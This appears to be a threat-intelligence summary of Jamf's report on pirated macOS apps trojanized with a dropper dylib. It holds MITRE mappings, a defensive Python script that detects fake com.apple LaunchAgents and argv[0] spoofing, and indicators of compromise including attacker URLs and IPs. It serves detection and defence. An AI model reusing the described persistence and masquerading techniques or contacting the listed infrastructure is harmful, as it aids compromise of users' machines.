Jamf Threat Labs Discovers Backdoored Pirated macOS Apps Resembling ZuRu Malware

Jamf Threat Labs uncovered pirated macOS apps backdoored with a dylib that downloads and executes further payloads, silently compromising the victim's machine. The campaign shares traits with the ZuRu malware: trojanized builds of popular tools hosted on Chinese piracy sites, a dylib that calls out to attacker infrastructure, and persistence through a LaunchAgent. #ZuRu #FinalShell #Khepri #LaunchAgents #macOS

Keypoints

  • Jamf Threat Labs found pirated macOS applications that have been modified to contact attacker infrastructure and download additional payloads.
  • A malicious dylib (libpng.dylib) is bundled with each app and loaded at launch, acting as a dropper that starts the malware in the background every time the app opens.
  • The dylib downloads a backdoor that uses the Khepri C2 and post-exploitation framework for command and control.
  • A separate persistent downloader is installed as a LaunchAgent whose plist masquerades as com.apple.fsevents and runs a hidden binary from /Users/Shared/.fseventsd, keeping the access alive across reboots.

MITRE Techniques

  • [T1055.001] Process Injection: Dynamic-link Library Injection – The malicious dylib libpng.dylib is loaded by the app at launch to start the malware in the background. “an additional dylib library titled libpng.dylib loaded at runtime. This dylib is loaded each time the application is opened thus starting the malware in the background.” Note that the dylib is loaded by the app's own (modified) binary rather than injected into a running process, so T1574 Hijack Execution Flow is arguably the closer mapping.
  • [T1027] Obfuscated Files and Information – Downloaded payloads are XOR-encoded and decoded in memory before execution. “Both of the downloaded executables are encoded with a custom XOR routine and get decoded in-memory before being written to disk.”
  • [T1543.001] Create or Modify System Process: Launch Agent – The persistent downloader is kept alive by a LaunchAgent that runs a hidden binary at login. “The LaunchAgent will ensure the .fseventsd binary persists by executing it at the hidden path /Users/Shared/.fseventsd.” (T1547.001, cited in some summaries, is the Windows Registry Run Keys / Startup Folder sub-technique and does not apply here.)
  • [T1059.004] Command and Scripting Interpreter: Unix Shell – The malware uses shell and launchctl commands, and rewrites its own argument vector so that process listings show it as ssh; the argument spoofing itself maps to T1564.010 Hide Artifacts: Process Argument Spoofing. “The arguments to represent that of ssh…”; “sudo launchctl procinfo 62127 ... program path = /private/tmp/.test argument count = 2 argument vector = { [0] = /usr/local/bin/ssh [1] = -n }”. Comparing the kernel-reported program path against argv[0] is the reliable way to spot this.
  • [T1071.001] Application Layer Protocol: Web Protocols – The dropper and downloader fetch payloads from attacker infrastructure over HTTP(S). “GET /fs.log HTTP/1.1 HOST: bd.vscode.digital” and similar requests to download payloads. The .log extension on executable payloads is itself a useful hunting signal.
  • [T1036.005] Masquerading: Match Legitimate Name or Location – Persistence artifacts use Apple-like naming (com.apple.fsevents.plist) and system-like paths (.fseventsd). “com.apple.fsevents prefix is an evasion technique… to disguise itself as a legitimate Apple plist.” Apple never installs com.apple.* plists into ~/Library/LaunchAgents, so any such file there warrants a look.
  • [T1041] Exfiltration Over C2 Channel – Cited as historical ZuRu behaviour for context, not something this write-up reports observing in the current campaign: “the ZuRu malware … would execute a Python script in the background to grab sensitive files and upload them to an attacker server.”
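The two host-side traits above that a defender can hunt for without any sample in hand are the masquerading LaunchAgent (Apple-style label in a user LaunchAgents directory, hidden program path under /Users/Shared) and the argv[0]-versus-program-path mismatch that launchctl procinfo exposes. The following script is an added example, not Jamf's code or the malware's; it parses LaunchAgent plists with the standard-library plistlib and scrapes the two fields from procinfo-style text. The plist bodies and the procinfo output are constructed sample inputs modelled on the quotes above, and the thresholds (which parent directories count as suspicious) are assumptions.

```python
"""Hunt for ZuRu-style LaunchAgent masquerading and argv[0] spoofing.

Added example (not from the Jamf write-up). Two checks:
  1. check_launch_agent(): flag LaunchAgent plists that carry a com.apple.*
     Label while living under ~/Library/LaunchAgents, and/or whose program is
     a hidden dotfile or sits in a world-writable location such as /Users/Shared.
  2. check_procinfo(): flag `launchctl procinfo <pid>` output whose argument
     vector [0] does not match the kernel-reported program path.
All sample data below is constructed for the example.
"""
import os
import plistlib
import re
from dataclasses import dataclass, field

# Assumption: locations where a legitimate LaunchAgent program should never live.
SUSPICIOUS_PARENTS = ("/Users/Shared", "/tmp", "/private/tmp")

PROCINFO_PATH = re.compile(r"program path\s*=\s*(\S+)")
PROCINFO_ARGV0 = re.compile(r"\[0\]\s*=\s*(\S+)")


@dataclass
class Finding:
    source: str
    reasons: list = field(default_factory=list)


def program_of(plist: dict) -> str:
    """LaunchAgents name their binary in Program or in ProgramArguments[0]."""
    if plist.get("Program"):
        return plist["Program"]
    args = plist.get("ProgramArguments") or []
    return args[0] if args else ""


def check_launch_agent(plist_path: str, data: bytes) -> Finding:
    """Inspect one LaunchAgent plist (raw bytes) found at plist_path."""
    f = Finding(plist_path)
    plist = plistlib.loads(data)
    label = plist.get("Label", "")
    prog = program_of(plist)
    # Apple's own agents live in /System/Library/LaunchAgents; a com.apple.*
    # label inside a user's home directory is the masquerade the report describes.
    if label.startswith("com.apple.") and plist_path.startswith("/Users/"):
        f.reasons.append(f"Apple-style label {label!r} in a user LaunchAgents dir")
    if os.path.basename(prog).startswith("."):
        f.reasons.append(f"hidden program path {prog!r}")
    if any(prog == p or prog.startswith(p + "/") for p in SUSPICIOUS_PARENTS):
        f.reasons.append(f"program under world-writable location {prog!r}")
    # RunAtLoad alone is normal; it only adds weight to an already suspicious agent.
    if plist.get("RunAtLoad") and f.reasons:
        f.reasons.append("RunAtLoad is set")
    return f


def check_procinfo(text: str) -> Finding:
    """Compare program path with argv[0] in `launchctl procinfo` output."""
    f = Finding("launchctl procinfo")
    m_path, m_argv = PROCINFO_PATH.search(text), PROCINFO_ARGV0.search(text)
    if not (m_path and m_argv):
        return f
    path, argv0 = m_path.group(1), m_argv.group(1)
    # Login shells legitimately prefix argv[0] with "-" (e.g. "-bash"); strip it.
    if os.path.basename(path) != os.path.basename(argv0).lstrip("-"):
        f.reasons.append(f"argv[0] {argv0!r} does not match program path {path!r}")
    return f


# Constructed sample inputs (not real artifacts from the campaign).
SAMPLE_MALICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.fsevents</string>
  <key>ProgramArguments</key><array><string>/Users/Shared/.fseventsd</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

SAMPLE_BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>Program</key><string>/Applications/Example.app/Contents/MacOS/updater</string>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

SAMPLE_SPOOFED_PROCINFO = """program path = /private/tmp/.test
argument count = 2
argument vector = {
    [0] = /usr/local/bin/ssh
    [1] = -n
}"""

SAMPLE_HONEST_PROCINFO = """program path = /usr/bin/ssh
argument count = 2
argument vector = {
    [0] = ssh
    [1] = -n
}"""

if __name__ == "__main__":
    for src, data in (("/Users/alice/Library/LaunchAgents/com.apple.fsevents.plist", SAMPLE_MALICIOUS_PLIST),
                      ("/Users/alice/Library/LaunchAgents/com.example.updater.plist", SAMPLE_BENIGN_PLIST)):
        f = check_launch_agent(src, data)
        print(src, "->", f.reasons or "clean")
    for text in (SAMPLE_SPOOFED_PROCINFO, SAMPLE_HONEST_PROCINFO):
        print(check_procinfo(text).reasons or "argv[0] consistent")
```

On a live Mac the plist check would be fed every file under each user's ~/Library/LaunchAgents, and the procinfo check the output of `sudo launchctl procinfo <pid>` for any process whose name in ps looks like ssh but whose executable lives somewhere unusual; the script deliberately avoids macOS-only tools so the logic can be unit-tested anywhere.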

Indicators of Compromise

  • [File name] navicat161_premium_cs.dmg, secureCRT.dmg – compromised DMGs used in the campaign. Context: the initial pirated apps carrying the dropper.
  • [SHA1] ca91c796f211f49b789b0bcdb1e07a26433c1c2d, daa12a5a3f393590e74338a19af444a706b122dd – file hashes for compromised DMGs.
  • [SHA1] c20ece082eefb432fa98a0e1535b4b4bdf6c97d3 (libpng.dylib from the Navicat Premium bundle) and d67726952ab17c1e3acef6e57bf1a24c98187810 – hashes of the malicious dylib.
  • [URL] download.macnavicat[.]com/bd.log, download.macnavicat[.]com/nv01.log; download.securecrt[.]vip/bd.log; download.ultraedit[.]info/bd.log; download.finallshell[.]cc/bd.log; download.rdesktophub[.]com/bd.log – payload delivery URLs.
  • [Domain] macnavicat[.]com, securecrt[.]cc, bd.vscode[.]digital – attacker infrastructure domains referenced in the campaign.
  • [IP] 47.242.144.113, 8.217.76.133, 8.217.132.190, 47.242.252.82 – sample attacker or proxy IPs observed.
  • [Path] /Users/Shared/.fseventsd (persistent downloader launched by the LaunchAgent); /tmp/.test, /tmp/.fseventsds (temporary dropper locations; /tmp is a symlink to /private/tmp on macOS, which is why launchctl reports /private/tmp/.test).
  • [SHA1] 1220bd814d4ac523b9a2c47d22bc01c43eb4bde3, 902e… (additional hashes listed in the article) – backdoor payloads.
  • [URL] bd.macnavicat[.]com/fs.log, etc. – endpoints polled by the persistent downloader for sustained access.

Read more: https://www.jamf.com/blog/jtl-malware-pirated-applications/